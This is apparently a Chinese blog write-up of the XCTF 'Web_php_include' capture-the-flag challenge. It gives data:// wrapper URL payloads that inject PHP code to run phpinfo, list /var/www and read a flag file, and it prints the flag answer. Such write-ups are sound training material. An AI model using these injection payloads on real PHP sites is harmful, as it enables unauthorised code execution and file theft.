攻防世界---Web_php_include

  • 开发
  • 15

1.题目链接

2.补充知识:

3.构造:执行成功

/?page=data://text/plain,<?php phpinfo()?>

4.构造下面url,得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>

5构造下面url,读取该路径的文件

?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。

/?page=data://text/plain,<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

7.

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-04-15 09:10:04       16 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-15 09:10:04       16 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-15 09:10:04       15 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-15 09:10:04       18 阅读

热门阅读

  2. 格式化字符串漏洞学习笔记

    2024-04-15 09:10:04       19 阅读

  3. Arduino IDE开发esp8266,如何调试

    2024-04-15 09:10:04       18 阅读

  4. Android Activity 启动涉及几个进程

    2024-04-15 09:10:04       17 阅读

  5. Anaconda在Ubuntu下的安装与简单使用

    2024-04-15 09:10:04       39 阅读

  8. 使用 Lua 协程处理异步回调函数

    2024-04-15 09:10:04       50 阅读

  9. xss常用标签和触发事件

    2024-04-15 09:10:04       16 阅读

  10. SpringBoot启动加载自己的策略类到容器中使用?

    2024-04-15 09:10:04       50 阅读

  18. Python和R概率统计算法建模评估气象和运动

    2024-04-15 09:10:04       22 阅读

  21. Qt实现Kermit协议(六)

    2024-04-15 09:10:04       22 阅读

  27. IDE:常见的集成开发环境

    2024-04-15 09:10:04       46 阅读

  28. C语言数组的初始化方法大全

    2024-04-15 09:10:04       16 阅读